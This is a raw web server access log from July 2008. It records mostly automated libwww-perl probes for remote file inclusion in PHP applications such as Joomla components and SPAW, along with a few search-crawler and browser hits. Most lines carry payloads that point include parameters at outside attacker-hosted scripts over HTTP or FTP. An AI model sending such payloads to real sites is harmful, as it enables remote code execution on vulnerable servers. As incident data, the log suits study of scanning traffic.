65.98.70.18 - - [13/Jul/2008:12:28:50 -0700] "GET /logs/access_080329.log/lostpasswd.php?env[include_prefix]=http://www.hotelberberys.pl/includes/domit/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:12:29:15 -0700] "GET /logs/access_080218.log/?sourcedir=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
204.15.10.22 - - [13/Jul/2008:12:29:24 -0700] "GET /logs/access.log/index2.php?_SERVER[DOCUMENT_ROOT]=http://www.tolokan.ovh.org/classes/adodbt/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.22 - - [13/Jul/2008:12:29:24 -0700] "GET /index2.php?_SERVER[DOCUMENT_ROOT]=http://www.tolokan.ovh.org/classes/adodbt/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.22 - - [13/Jul/2008:12:29:25 -0700] "GET /logs/index2.php?_SERVER[DOCUMENT_ROOT]=http://www.tolokan.ovh.org/classes/adodbt/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.29.4.54 - - [13/Jul/2008:12:29:30 -0700] "GET /logs/access_080329.log//?pg=http://gang11.co.cc/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.75.225.10 - - [13/Jul/2008:12:29:33 -0700] "GET /logs/access_080315.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://keycell.webs.com/IDscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.29.4.54 - - [13/Jul/2008:12:29:39 -0700] "GET //?pg=http://gang11.co.cc/file/id.txt??? HTTP/1.1" 200 18375 "-" "libwww-perl/5.79" "www.dmulk.com"
205.234.252.183 - - [13/Jul/2008:12:29:50 -0700] "GET /logs/access.log/index2.php?_SERVER[DOCUMENT_ROOT]=http://www.tolokan.ovh.org/classes/adodbt/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.252.183 - - [13/Jul/2008:12:29:50 -0700] "GET /index2.php?_SERVER[DOCUMENT_ROOT]=http://www.tolokan.ovh.org/classes/adodbt/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.252.183 - - [13/Jul/2008:12:29:50 -0700] "GET /logs/index2.php?_SERVER[DOCUMENT_ROOT]=http://www.tolokan.ovh.org/classes/adodbt/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
86.109.105.165 - - [13/Jul/2008:12:29:51 -0700] "GET /logs/access_071218.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.105.165 - - [13/Jul/2008:12:29:52 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.25.149.45 - - [13/Jul/2008:12:29:52 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.109.105.165 - - [13/Jul/2008:12:29:52 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.25.149.45 - - [13/Jul/2008:12:29:52 -0700] "GET /akocomments.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.149.45 - - [13/Jul/2008:12:29:53 -0700] "GET /logs/access_080214.log/index.php?canal=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.149.45 - - [13/Jul/2008:12:29:54 -0700] "GET /logs/access_080303.log/index.php?canal=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.29.178 - - [13/Jul/2008:12:30:05 -0700] "GET /logs/access_080207.log/administrator/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
86.109.105.165 - - [13/Jul/2008:12:30:20 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.67.25.167 - - [13/Jul/2008:12:30:28 -0700] "GET /logs/access_080118.log/inc/cmses/aedatingCMS.php?dir[inc]=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.25.167 - - [13/Jul/2008:12:30:28 -0700] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.25.167 - - [13/Jul/2008:12:30:28 -0700] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.19.6.245 - - [13/Jul/2008:12:30:36 -0700] "GET /logs/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.19.6.245 - - [13/Jul/2008:12:30:36 -0700] "GET /components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
212.143.233.40 - - [13/Jul/2008:12:30:44 -0700] "GET /logs/access_080329.log/index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://www.terrazon.com.ar/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.29.4.54 - - [13/Jul/2008:12:30:44 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://gang11.co.cc/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.143.233.40 - - [13/Jul/2008:12:30:48 -0700] "GET /index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://www.terrazon.com.ar/bajo.txt? HTTP/1.1" 200 18501 "-" "libwww-perl/5.79" "www.dmulk.com"
200.29.4.54 - - [13/Jul/2008:12:30:50 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://gang11.co.cc/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.143.233.40 - - [13/Jul/2008:12:30:58 -0700] "GET /logs/index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://www.terrazon.com.ar/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.67.25.167 - - [13/Jul/2008:12:31:35 -0700] "GET /logs/access.log/inc/cmses/aedatingCMS.php?dir[inc]=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.70.36.107 - - [13/Jul/2008:12:31:46 -0700] "GET /logs/access_080313.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=injexhttp://www.coronaclub.it/pk_gallery/photos/25/11828333/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.36.107 - - [13/Jul/2008:12:32:05 -0700] "GET /logs/access_080207.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=injexhttp://www.coronaclub.it/pk_gallery/photos/25/11828333/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.211.29 - - [13/Jul/2008:12:32:06 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.29 - - [13/Jul/2008:12:32:07 -0700] "GET /mobileoffice/?M=D HTTP/1.1" 200 5024 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
80.67.25.167 - - [13/Jul/2008:12:32:21 -0700] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.15.10.22 - - [13/Jul/2008:12:32:26 -0700] "GET /logs/access_080225.log/index2.php?_SERVER[DOCUMENT_ROOT]=http://www.tolokan.ovh.org/classes/adodbt/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
201.255.237.127 - - [13/Jul/2008:12:32:38 -0700] "GET /logs/access_070921.log HTTP/1.1" 200 70813 "http://www.google.com.ar/search?hl=es&q=32998+utn&meta=" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.1)" "www.dmulk.com"
205.234.252.183 - - [13/Jul/2008:12:33:19 -0700] "GET /logs/access_080225.log/index2.php?_SERVER[DOCUMENT_ROOT]=http://www.tolokan.ovh.org/classes/adodbt/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.6.18.246 - - [13/Jul/2008:12:33:20 -0700] "GET /logs/access.log HTTP/1.0" 200 357587 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
195.19.6.245 - - [13/Jul/2008:12:33:27 -0700] "GET /logs/access_080207.log/components/com_cpg/cpg.php?mosConfig_absolute_path=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.89.31.195 - - [13/Jul/2008:12:33:27 -0700] "GET /logs/access.log/index1.php?=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.31.195 - - [13/Jul/2008:12:33:28 -0700] "GET /logs/access.log/index1.php?=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.31.195 - - [13/Jul/2008:12:33:28 -0700] "GET /index1.php?=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.31.195 - - [13/Jul/2008:12:33:28 -0700] "GET /index1.php?=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.31.195 - - [13/Jul/2008:12:33:28 -0700] "GET /logs/index1.php?=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.31.195 - - [13/Jul/2008:12:33:28 -0700] "GET /logs/index1.php?=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.106.18.76 - - [13/Jul/2008:12:33:42 -0700] "GET /logs/access_080315.log/main.php5?page=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.18.76 - - [13/Jul/2008:12:33:47 -0700] "GET /logs/access_080315.log/main.php5?page=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.134.105.107 - - [13/Jul/2008:12:35:04 -0700] "GET /logs/access_080128.log/index.php?inc_dir=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.134.105.107 - - [13/Jul/2008:12:35:20 -0700] "GET /logs/access_080112.log/index.php?inc_dir=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.134.105.107 - - [13/Jul/2008:12:35:23 -0700] "GET /logs/access_080128.log/index.php?inc_dir=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.134.105.107 - - [13/Jul/2008:12:35:36 -0700] "GET /logs/access_080112.log/index.php?inc_dir=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.64.177.199 - - [13/Jul/2008:12:35:42 -0700] "GET /logs/access_080315.log/index.php?option=com_galleriahttp://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.227.193.211 - - [13/Jul/2008:12:35:43 -0700] "GET /akocomments.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.211 - - [13/Jul/2008:12:35:43 -0700] "GET /akocomments.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.55.146.38 - - [13/Jul/2008:12:36:18 -0700] "GET /logs/access_080325.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.radio-htrm.de/apache/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.207.108.27 - - [13/Jul/2008:12:36:23 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.207.108.27 - - [13/Jul/2008:12:36:23 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.207.108.27 - - [13/Jul/2008:12:36:23 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.170.79.2 - - [13/Jul/2008:12:36:33 -0700] "GET /logs//popup_window.php?site_isp_root=http://madgearx.com/images/test.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.170.79.2 - - [13/Jul/2008:12:36:33 -0700] "GET //popup_window.php?site_isp_root=http://madgearx.com/images/test.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.55.146.38 - - [13/Jul/2008:12:36:54 -0700] "GET /logs/access_080418.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.radio-htrm.de/apache/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.146.38 - - [13/Jul/2008:12:37:00 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.radio-htrm.de/apache/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.146.38 - - [13/Jul/2008:12:37:00 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.radio-htrm.de/apache/on.txt?? HTTP/1.1" 200 18495 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.146.38 - - [13/Jul/2008:12:37:37 -0700] "GET /logs/access_080228.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.radio-htrm.de/apache/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.109.105.165 - - [13/Jul/2008:12:38:04 -0700] "GET /logs/access_071218.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.105.165 - - [13/Jul/2008:12:38:04 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.105.165 - - [13/Jul/2008:12:38:05 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.29.4.54 - - [13/Jul/2008:12:38:06 -0700] "GET /logs/access_080315.log//?pg=http://gang11.co.cc/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.105.165 - - [13/Jul/2008:12:38:07 -0700] "GET /logs/access_071230.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.146.134.209 - - [13/Jul/2008:12:38:30 -0700] "GET /logs/access_080420.log/index.php?configFile=http://steam2k8.st.funpic.de/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.117.89.191 - - [13/Jul/2008:12:38:37 -0700] "GET /logs/index.php?canal=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.117.89.191 - - [13/Jul/2008:12:38:40 -0700] "GET /index.php?canal=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 200 18411 "-" "libwww-perl/5.803" "www.dmulk.com"
217.114.163.198 - - [13/Jul/2008:12:38:46 -0700] "GET /logs/access_080118.log/index.php?option=com_extcalendarhttp://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.151.10.200 - - [13/Jul/2008:12:40:06 -0700] "GET / HTTP/1.1" 200 18257 "http://www.st-owners.com/forums/showthread.php?t=45162" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.26 - - [13/Jul/2008:12:40:06 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.1" 200 9232 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "dmulk.com"
194.72.9.26 - - [13/Jul/2008:12:40:07 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.1" 200 5241 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "dmulk.com"
194.72.9.26 - - [13/Jul/2008:12:40:08 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.1" 200 4019 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "dmulk.com"
194.72.9.26 - - [13/Jul/2008:12:40:08 -0700] "GET /blog/wp-includes/js/jquery/jquery.js?ver=1.2.3 HTTP/1.1" 200 29867 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "dmulk.com"
85.25.149.45 - - [13/Jul/2008:12:40:38 -0700] "GET /logs/access_080329.log//admin/classes/TplLoad.php?full_path_to_public_program=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.117 - - [13/Jul/2008:12:41:10 -0700] "GET /logs/access_071224.log//start.php?s=http://h1.ripway.com/cmdid/idvscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.117 - - [13/Jul/2008:12:41:11 -0700] "GET //start.php?s=http://h1.ripway.com/cmdid/idvscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.117 - - [13/Jul/2008:12:41:11 -0700] "GET /logs//start.php?s=http://h1.ripway.com/cmdid/idvscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.151.102.50 - - [13/Jul/2008:12:41:17 -0700] "GET /logs/middle.php?page=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.151.102.50 - - [13/Jul/2008:12:41:17 -0700] "GET /middle.php?page=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.149.45 - - [13/Jul/2008:12:41:21 -0700] "GET /logs/access_080313.log//admin/classes/TplLoad.php?full_path_to_public_program=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.255.236.6 - - [13/Jul/2008:12:41:22 -0700] "GET //start.php?s=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.255.236.6 - - [13/Jul/2008:12:41:23 -0700] "GET //start.php?s=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.146.134.209 - - [13/Jul/2008:12:42:04 -0700] "GET /logs/index.php?x=http://steam2k8.st.funpic.de/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.146.134.209 - - [13/Jul/2008:12:42:05 -0700] "GET /logs/access_080225.log/index.php?x=http://steam2k8.st.funpic.de/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.146.134.209 - - [13/Jul/2008:12:42:09 -0700] "GET /index.php?x=http://steam2k8.st.funpic.de/help01.txt??? HTTP/1.1" 200 18401 "-" "libwww-perl/5.805" "www.dmulk.com"
82.165.180.214 - - [13/Jul/2008:12:42:19 -0700] "GET /logs/access_080118.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.165.180.214 - - [13/Jul/2008:12:42:19 -0700] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.165.180.214 - - [13/Jul/2008:12:42:19 -0700] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.111.173.117 - - [13/Jul/2008:12:42:30 -0700] "GET /logs/access_080329.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://h1.ripway.com/cmdid/idvscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.149.45 - - [13/Jul/2008:12:43:03 -0700] "GET /logs/access_080128.log/akocomments.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.223.138.100 - - [13/Jul/2008:12:43:06 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.223.138.100 - - [13/Jul/2008:12:43:07 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.65.79 - - [13/Jul/2008:12:43:19 -0700] "GET /logs/access_071218.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.degorzen.nl/Joomla/mambots/editors/htmlarea2/popups/albid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.65.79 - - [13/Jul/2008:12:43:19 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.degorzen.nl/Joomla/mambots/editors/htmlarea2/popups/albid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.65.79 - - [13/Jul/2008:12:43:20 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.degorzen.nl/Joomla/mambots/editors/htmlarea2/popups/albid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.65.79 - - [13/Jul/2008:12:43:25 -0700] "GET /logs/access_071213.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.degorzen.nl/Joomla/mambots/editors/htmlarea2/popups/albid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.64.195.223 - - [13/Jul/2008:12:43:49 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.oc12.it/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.188 - - [13/Jul/2008:12:43:57 -0700] "GET /logs/access_080214.log//index.php?canal=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.64.195.220 - - [13/Jul/2008:12:43:58 -0700] "GET /logs/access_071225.log/errors.php?error=http://www.oc12.it/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.1.115 - - [13/Jul/2008:12:44:00 -0700] "GET /errors.php?error=http://www.radio-htrm.de/apache/n??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.108.66.188 - - [13/Jul/2008:12:44:01 -0700] "GET //index.php?canal=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 200 18395 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.188 - - [13/Jul/2008:12:44:02 -0700] "GET /logs//index.php?canal=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.1.115 - - [13/Jul/2008:12:44:07 -0700] "GET /logs/access_080329.log/errors.php?error=http://www.radio-htrm.de/apache/n??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.108.66.188 - - [13/Jul/2008:12:44:07 -0700] "GET /logs/access_080303.log//index.php?canal=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.1.115 - - [13/Jul/2008:12:44:07 -0700] "GET /logs/errors.php?error=http://www.radio-htrm.de/apache/n??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.89.31.195 - - [13/Jul/2008:12:44:07 -0700] "GET /logs/access_080313.log/index1.php?=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.31.195 - - [13/Jul/2008:12:44:07 -0700] "GET /logs/access_080313.log/index1.php?=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.25.149.45 - - [13/Jul/2008:12:44:09 -0700] "GET /logs/access_080103.log/akocomments.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.87.92.250 - - [13/Jul/2008:12:44:25 -0700] "GET /logs/access_080329.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.87.92.250 - - [13/Jul/2008:12:44:25 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.87.92.250 - - [13/Jul/2008:12:44:25 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.244.233.121 - - [13/Jul/2008:12:44:34 -0700] "GET /logs/access_080329.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [13/Jul/2008:12:44:34 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
